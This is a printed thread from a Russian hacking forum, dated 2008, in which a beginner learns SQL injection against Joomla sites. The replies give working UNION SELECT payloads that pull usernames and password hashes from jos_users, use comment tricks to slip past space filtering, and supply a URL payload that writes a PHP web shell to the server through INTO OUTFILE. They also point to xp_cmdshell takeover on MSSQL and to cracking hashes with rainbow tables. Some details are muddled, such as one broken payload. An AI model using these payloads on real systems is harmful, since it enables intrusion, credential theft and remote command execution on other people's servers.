SQL Injection

Хак! Ломать не строить - это уметь надо

Версия для печати темы

Нажмите сюда для просмотра этой темы в оригинальном формате

Твой софтовый форум Хак! Ломать не строить - это уметь надо SQL Injection

Автор: Ra1N 12.03.2008 - 5:52

Приветствую!

У меня проблема следующего плана, есть сформированый до меня sql запрос: /**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*

Очень хотелось бы составить свой, но меня пугают символы:
/**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*
что они означают, и как с ними разобраться, не могли бы вы помочь, или хотя бы кинуть ссылку а толковый мануал?!

Автор: Soloton 12.03.2008 - 8:21

Цитата | Quote(Rain of Dark @ 12.03.2008 - 5:52)

0x3a

Это шестнадцатеричное представление символа : (двоеточие).

Автор: de1ay 12.03.2008 - 8:56

Цитата | Quote

есть сформированый до меня sql запрос

Довольно странный запрос... Он в принципе рабочий? Не вижу подобраных колонок.

Цитата | Quote

/**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*

Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):
+union+select+1,concat(username,0x3a,password),3,4+from+jos_users
+union+select+1,concat_ws(0x3a,username,password),3,4+from+jos_users
+union+select+1,concat(aes_decrypt(aes_encrypt(username,0x3a,password),3,4+from+
jos_users
+ заменишь на /**/ если не прокатит...
PS: покажи где ты оное нашел.

Автор: Ra1N 12.03.2008 - 13:16

Цитата | Quote(delay(0) @ 12.03.2008 - 16:56)

Цитата | Quote

есть сформированый до меня sql запрос

Довольно странный запрос... Он в принципе рабочий? Не вижу подобраных колонок.

Цитата | Quote

/**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*

_http://www.xakep.ru/post/42707/default.asp
то есть я правильно понимаю? "/**/"="+", а "0x3a"=":"
А почему тогда просто "+" не использовали?
А что означает фраза: "Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):"?
а можно вместо select insert использовать?

Автор: de1ay 12.03.2008 - 16:10

Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16)

то есть я правильно понимаю? "/**/"="+", а "0x3a"=":"

Нет, /**/ - обход фильтрации пробелов, "+", он же %20, он же пробел, может фильтроваться в запросах.

Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16)

А почему тогда просто "+" не использовали?

См. выше.

Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16)

А что означает фраза: "Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):"?

Почитай статьи по sql-иньекциям, их в интернете великое множество.

Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16)

а можно вместо select insert использовать?

Нет, после union insert использовать нельзя.

Автор: Ra1N 12.03.2008 - 16:38

Цитата | Quote(delay(0) @ 13.03.2008 - 0:10)

Нет, после union insert использовать нельзя

а вообще, кроме select?

Автор: de1ay 12.03.2008 - 18:48

Цитата | Quote(Rain of Dark @ 12.03.2008 - 16:38)

а вообще, кроме select?

Что?

Автор: Ra1N 13.03.2008 - 6:41

Цитата | Quote(delay(0) @ 13.03.2008 - 2:48)

Что?

ну кроме select что нибидь можно использовать? ну там, update, delete, и т.д

Автор: de1ay 13.03.2008 - 8:15

Цитата | Quote(Rain of Dark @ 13.03.2008 - 6:41)

ну кроме select что нибидь можно использовать? ну там, update, delete, и т.д

Тю, я ступил, insert юзать можно, но при magic quotes = off, тоесть, ' не должны экранироваться.

Автор: Ra1N 13.03.2008 - 13:17

экранироваться = фильтроваться? Оо

Автор: de1ay 13.03.2008 - 17:35

Цитата | Quote(Rain of Dark @ 13.03.2008 - 13:17)

экранироваться = фильтроваться? Оо

Именно.
И все же, не прав я был по поводу insert`a, после union только селект использовать можно.

Автор: Ra1N 14.03.2008 - 5:08

а тогда каков смысл таких атак?
Расшифровать хэш врядли получится, подделать кукисы в cms типа jooml'ы тоже не удается, тогда все эти инъекции бесполезны?

Автор: de1ay 14.03.2008 - 8:23

Цитата | Quote(Rain of Dark @ 14.03.2008 - 5:08)

Расшифровать хэш врядли получится, подделать кукисы в cms типа jooml'ы тоже не удается, тогда все эти инъекции бесполезны?

А почему так категорично на счет хэша? Вполне реально его сбрутить, если присутствует желание. Можно читать файлы, можно шелл залить...
В MSSQL, если крутитится она от пользователя sa, можно использовать xp_cmdshell, что может привести к полному контролю над машиной.

Автор: Ra1N 14.03.2008 - 12:06

а шелл то как можно залить если только читать файлы можно и select использовать?! О.о

А на счет хэша, ну если допустим даже пароль из восьми символов, да еще и с использованием хотябы одного спецсимвола, то это ж на стену полезишь, пока его сбрутишь!

Цитата | Quote

В MSSQL, если крутитится она от пользователя sa, можно использовать xp_cmdshell

это еще что за пользователь такой?

Автор: de1ay 16.03.2008 - 10:44

Цитата | Quote(Rain of Dark @ 14.03.2008 - 12:06)

а шелл то как можно залить если только читать файлы можно и select использовать?! О.о

Не игнорь мои советы прочитать статью.

Code

http://www.site.ru/index.php?page=-1+union+select+1,2,,'<?php system($_GET[cmd]); ?>',4,5+from+user+into+outfile+'/home/site/html/shell.php'/*

Цитата | Quote(Rain of Dark @ 14.03.2008 - 12:06)

А на счет хэша, ну если допустим даже пароль из восьми символов, да еще и с использованием хотябы одного спецсимвола, то это ж на стену полезишь, пока его сбрутишь!

Есть такие замечательные таблицы - Rainbow tables. Сильно сокращают время подбора хэша.

Цитата | Quote(Rain of Dark @ 14.03.2008 - 12:06)

это еще что за пользователь такой?

root в mysql.

Автор: Ra1N 16.03.2008 - 13:44

Цитата | Quote(delay(0) @ 16.03.2008 - 18:44)

Есть такие замечательные таблицы - Rainbow tables. Сильно сокращают время подбора хэша.

а можно поподробнее об этих самых таблицах, ну или хоть линку дай

Добавлено:
а, все не надо, нашел, спасибо за помощь!
Респект!